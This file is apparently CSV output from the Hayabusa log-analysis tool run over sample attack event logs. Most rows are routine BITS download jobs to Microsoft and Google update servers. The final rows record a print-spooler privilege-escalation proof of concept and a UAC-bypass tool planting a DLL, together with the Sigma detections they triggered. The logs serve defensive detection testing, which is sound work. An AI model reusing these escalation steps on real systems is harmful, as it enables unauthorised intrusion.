2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-18 19:01:10.759 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b7AcJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:45.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:46.212 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 06:49:57.232 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{760E100C-4E23-45B0-A2E1-BB2607BF6ED4}-87.0.4280.66_86.0.4240.198_chrome_updater.exe | URL: http://r4---sn-5hne6nsr.gvt1.com/edgedl/release2/chrome/GIUtDEIRbSWI1y147Zo4bw_87.0.4280.66/87.0.4280.66_86.0.4240.198_chrome_updater.exe?cms_redirect=yes&mh=ls&mip=213.127.67.111&mm=28&mn=sn-5hne6nsr&ms=nvh&mt=1605736037&mv=m&mvi=4&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:04:09.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9Paa.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 18:33:33.409 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b9S4l.img?w=100&h=100&m=6&tilesize=medium&x=1140&y=780&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-19 19:45:57.562 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aQJnx.img?w=100&h=100&m=6&tilesize=medium&x=1069&y=1223&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-20 02:49:15.960 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:30.660 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:12:31.102 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:16:44.077 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/mimojjlkmoijpicakmndhoigimigcmbb/32.0.0.453/32.0.0.433/6a7cbd12b20a2b816950c10566b3db00371455731ff01526469af574701da085.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:18:47.864 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gcmjkmgdlgnkkcocmoeiminaijmmjnii/9.18.0/9.16.0/ce6075b044b6a23d590819332659310fbc6327480d4ce28d85700575fd1d389b.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:01.301 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/43/42/e0b8b1fb7c27acac43c236b9f6b029b07f2a3b661b5d8eed22848180aaf4f04e.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:08.126 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/KbGq9i1aCJZgbOKmNv6oJQ_6252/VL8i_VzJSassyW3AF-YJHg,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:17.194 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/ONVXH2AuMZGs-h196MV_Rg_2505/bYFE7q-GLInSBxc008hucw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:21.164 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/APhHMzuprJvS7ixvnAk_gdI_1/anGnv31dmOJhheXBnYQ3gw,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:25.377 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AJqZYiqGvCtix64S2N84g-M_2020.11.2.164946/EWvH2e-LS80S29cxzuTfRA,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:19:34.726 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Z0dgM6Cm_Rt2z0LEtvtuMA_2020.11.16.1201/AIpG92DElyR2vE9pGKmvVoc,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:16.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1begCn.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-21 20:50:17.148 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:58.415 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 00:54:59.449 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:56.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bdETn.img?w=100&h=100&m=6&tilesize=medium&x=1080&y=363&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-22 01:00:57.346 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:03.984 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bgw4d.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:46:04.676 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161351840456_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:42.355 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 19:52:43.097 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 20:05:14.300 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bh3sJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:44:11.565 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.224 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 21:46:56.973 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-23 23:09:10.403 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhxvH.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:34:38.147 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhAo3.img?w=100&h=100&m=6&tilesize=medium&x=1228&y=258&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 00:41:52.668 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bhEQI.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:56.181 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-24 21:47:57.912 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 06:06:52.429 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aV2sK.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 08:55:56.229 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1bkiYw.img?w=100&h=100&m=6&tilesize=medium&x=1094&y=441&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:56:29.274 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://storage.googleapis.com/update-delta/gkmgaooipdjhmangpemjhigmamcehddo/86.249.200/84.243.200/17f6e5d11e18da93834a470f7266ede269d3660ac7a4c31c0d0acdb0c4c34ba2.crxd,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:51.221 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/AN67dIUbQty67HoEacsJ61c_6260/APHk7sg8XbALFcVmjTty4CQ,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 18:57:59.420 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Chrome Component Updater | URL: http://redirector.gvt1.com/edgedl/release2/chrome_component/Jo7Lnj2MkXB5ezNave49dw_2509/AOHc3HV2drrDzlxLOXeJFhs,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:33.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-25 23:04:36.013 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,"Cmd: pocacct.exe payload.dll | Process: C:\Users\lgreen\Downloads\PrivEsc\pocacct.exe | User: 3B\lgreen | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x2dfbe | PID: 6320 | PGUID: 6A3C3EF2-8721-5FBF-0000-001009894600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:44:49.642 +09:00,02694w-win10.threebeesco.com,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:45:14.007 +09:00,02694w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 8716 | PGUID: 6A3C3EF2-8739-5FBF-0000-001075514700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 19:45:24.216 +09:00,02694w-win10.threebeesco.com,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_sysmon_cve_20201030_spooler.evtx
2020-11-26 22:23:30.614 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-26 22:23:32.141 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: byeintegrity5-uac.exe | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x6ca44 | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.138 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\Public\tools\privesc\uac\system32\npmproxy.dll | Process: C:\Users\Public\tools\privesc\uac\byeintegrity5-uac.exe | PID: 11644 | PGUID: 00247C92-E803-5FBF-0000-0010D1B5B40C,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.147 +09:00,LAPTOP-JU4M3I0E,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.154 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: taskhostw.exe $(Arg0) | Process: C:\Windows\System32\taskhostw.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x6c9e0 | PID: 17336 | PGUID: 00247C92-E803-5FBF-0000-0010CDB9B40C,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
2020-11-27 02:38:11.175 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: taskhostw.exe $(Arg0) | LID: 0x6c9e0 | PID: 16980 | PGUID: 00247C92-E803-5FBF-0000-0010F2BFB40C",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_uacbypass_CDSSync_schtask_hijack_byeintegrity5.evtx
